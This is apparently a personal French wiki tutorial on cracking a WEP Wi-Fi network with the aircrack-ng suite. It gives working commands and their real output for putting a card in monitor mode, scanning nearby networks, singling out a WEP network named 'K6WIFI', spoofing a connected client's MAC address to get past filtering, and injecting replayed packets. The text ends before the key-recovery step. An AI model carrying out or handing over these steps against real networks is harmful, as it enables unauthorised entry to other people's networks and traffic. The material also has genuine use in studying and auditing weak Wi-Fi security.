====== Cracker un reseau WEP ======

Lien:
  -http://www.insolegeek.com/04/05/2009/cracker-une-cle-wep-ou-wpa-avec-linux-en-quelques-minutes/
  -http://www.tuto-fr.com/tutoriaux/tutorial-crack-wep-aircrack.php

Avec un eeePC ...

===== Interface Wifi =====
Voir les interfaces Wifi disponible:
  # airmon-ng
  Interface       Chipset         Driver
  
  wifi0           Atheros         madwifi-ng
  ath0            Atheros         madwifi-ng VAP (parent: wifi0)

Demarrer le monitor sur l'interface **''wifi0''**
  # airmon-ng start wifi0
  Interface       Chipset         Driver
  
  wifi0           Atheros         madwifi-ngError for wireless request "Set Frequency" (8B04) :
      SET failed on device ath1 ; No such device.
  ath1: ERROR while getting interface flags: No such device
  
  ath0            Atheros         madwifi-ng VAP (parent: wifi0)
  ath2            Atheros         madwifi-ng VAP (parent: wifi0)

Oups: c'est quoi cette erreur ?

Capter les reseaux...
  # airodump-ng --write fichier ath2

  CH 12 ][ Elapsed: 7 mins ][ 2008-04-20 00:36
  
  BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
   
  16:78:DF:XX:XX:7E   38      808        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
  16:78:DF:XX:XX:7D   36      800        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
  16:78:DF:XX:XX:7C   35      792        1    0  13  54  WEP  WEP         K6WIFI
  16:78:DF:XX:XX:7F   36      797        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
  6E:6A:97:ZZ:ZZ:8D   26      848        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
  6E:6A:97:ZZ:ZZ:8C   26      805        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
  6E:6A:97:ZZ:ZZ:8F   28      811        0    0  13  54  WPA  TKIP   MGT  freephonie
  6E:6A:97:ZZ:ZZ:8E   28      832        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
  
  BSSID              STATION            PWR  Lost  Packets  Probes
  
  (not associated)   00:03:9D:XX:XX:XX   37    31      784  K6WIFI
  (not associated)   00:15:AF:XX:XX:XX    0     0       36

On s'interesse au reseau "WEP" et/ou dont la colonne ''#Data'' est non nulle.

On affine l'ecoute sur le reseau faible:
  # airodump-ng --write test2 --channel 13 --bssid 16:78:DF:XX:XX:7C ath2


On emprunte la MAC d'une **''station''** et on teste qu'on peut l'emprunter (c'est pour le cas d'un filtrage par IP)
  # aireplay-ng -1 0 -e K6WIFI -a 16:78:DF:XX:XX:7C -h 00:03:9D:XX:XX:XX ath2
  The interface MAC (06:15:AF:XX:XX:XX) doesn't match the specified MAC (-h).
          ifconfig ath2 hw ether 00:03:9D:XX:XX:XX
  01:05:12  Waiting for beacon frame (BSSID: 16:78:DF:XX:XX:7C)
  01:05:12  Sending Authentication Request
  01:05:12  Authentication successful
  01:05:12  Sending Association Request
  01:05:13  Association successful :-)

On simuler un tas de paquet avec la MAC ...
| :!: Il faut être dans le __même__ repertoire |
Sur une console, on demarre l'ecoute:
  # airodump-ng --write test2 --channel 13 --bssid 16:78:DF:XX:XX:7C ath2
Sur l'autre, on existe (__même repertoire!) on existe le réseau:
  # aireplay-ng -3 -e K6WIFI -b 16:78:DF:XX:XX:7C -h 00:03:9D:XX:XX:XX ath2
(Notez les petits changement dans les options: **''-3''** et **''-b''**)